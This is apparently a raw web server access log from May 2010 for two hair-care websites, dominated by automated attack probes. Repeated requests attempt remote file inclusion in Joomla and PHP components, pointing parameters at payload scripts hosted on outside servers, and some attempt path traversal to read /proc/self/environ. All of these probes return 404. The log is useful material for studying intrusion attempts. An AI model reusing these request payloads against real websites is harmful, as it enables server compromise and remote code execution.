222.236.47.182 - - [03/May/2010:06:41:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.114.238 - - [03/May/2010:06:42:40 -0700] "GET /logs/access_100222.log HTTP/1.0" 200 3322730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
222.236.47.182 - - [03/May/2010:06:42:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [03/May/2010:06:42:58 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [03/May/2010:06:42:58 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [03/May/2010:06:43:15 -0700] "GET /include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:06:43:15 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:06:43:15 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:06:43:18 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [03/May/2010:06:43:24 -0700] "GET /include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:06:43:24 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:06:43:24 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:06:43:55 -0700] "GET /logs/access_100104.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:06:43:55 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:06:43:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:39 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:39 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:44 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:44 -0700] "GET /logs/access_100111.log//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:06:44:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.128.135.38 - - [03/May/2010:06:46:41 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.212.226.210 - - [03/May/2010:06:49:40 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
91.212.226.210 - - [03/May/2010:06:49:41 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
66.249.65.111 - - [03/May/2010:06:50:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5482 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:06:52:56 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [03/May/2010:06:55:05 -0700] "GET /index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:07 -0700] "GET /logs/access_100104.log//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:07 -0700] "GET /logs//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:07 -0700] "GET /logs//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:07 -0700] "GET /logs/access_100104.log//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:07 -0700] "GET /index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:11 -0700] "GET /logs/access_100301.log//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:06:55:13 -0700] "GET /logs/access_100301.log//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [03/May/2010:07:00:44 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "freehairsecrets.com"
91.212.226.210 - - [03/May/2010:07:00:44 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "freehairsecrets.com"
77.88.25.28 - - [03/May/2010:07:01:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14057 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
222.236.47.182 - - [03/May/2010:07:02:27 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:07:02:28 -0700] "GET /logs/access_100104.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:07:02:28 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:19 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:19 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:23 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:23 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:03:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [03/May/2010:07:04:51 -0700] "GET /logs/access_100208.log//Neos_Chronos/header.php?base_folder=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [03/May/2010:07:04:53 -0700] "GET /Neos_Chronos/header.php?base_folder=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [03/May/2010:07:05:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:05:21 -0700] "GET /logs/access_100301.log%20%20//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:05:39 -0700] "GET /logs/access_100301.log%20%20//index.php?foing_root_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:07:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:07:33 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:07:33 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:07:58 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:07:58 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:07:58 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:08:14 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:08:14 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:08:15 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:10:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:10:14 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [03/May/2010:07:10:15 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.201.66.83 - - [03/May/2010:07:12:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
91.201.66.83 - - [03/May/2010:07:12:41 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
211.232.85.247 - - [03/May/2010:07:13:02 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:02 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:02 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:23 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:23 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:24 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.202.242.101 - - [03/May/2010:07:13:27 -0700] "GET /login.php?foing_root_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
211.232.85.247 - - [03/May/2010:07:13:49 -0700] "GET /logs/access_100419.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.202.242.101 - - [03/May/2010:07:15:32 -0700] "GET /logs/access_100104.log//login.php?foing_root_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.202.242.101 - - [03/May/2010:07:15:32 -0700] "GET /login.php?foing_root_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.202.242.101 - - [03/May/2010:07:15:32 -0700] "GET /logs//login.php?foing_root_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.202.242.101 - - [03/May/2010:07:15:36 -0700] "GET /logs/access_100301.log//login.php?foing_root_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:15:53 -0700] "GET /login.php?foing_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:16:07 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:16:07 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:16:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:18:50 -0700] "GET /logs/access_100104.log//login.php?foing_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:18:51 -0700] "GET /login.php?foing_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:18:51 -0700] "GET /logs//login.php?foing_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:07:18:59 -0700] "GET /logs/access_100301.log//login.php?foing_root_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:22:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:22:34 -0700] "GET /skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.221.150.100 - - [03/May/2010:07:22:34 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:22:48 -0700] "GET //index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:23:00 -0700] "GET //index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
62.128.135.38 - - [03/May/2010:07:23:39 -0700] "GET /logs/access_100412.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [03/May/2010:07:23:39 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [03/May/2010:07:23:39 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:07:24:30 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:07:24:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:07:24:30 -0700] "GET /logs/access_100426.log//components/com_performs/performs.php?mosConfig_absolute_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:29 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:31 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.18.166 - - [03/May/2010:07:26:31 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:28 -0700] "GET /logs/access.log///index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:29 -0700] "GET //index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:29 -0700] "GET /logs///index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:52 -0700] "GET /logs/access.log///index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:53 -0700] "GET //index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
83.69.115.198 - - [03/May/2010:07:29:53 -0700] "GET /logs///index.php?option=com_babackup&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.110.50.139 - - [03/May/2010:07:33:00 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
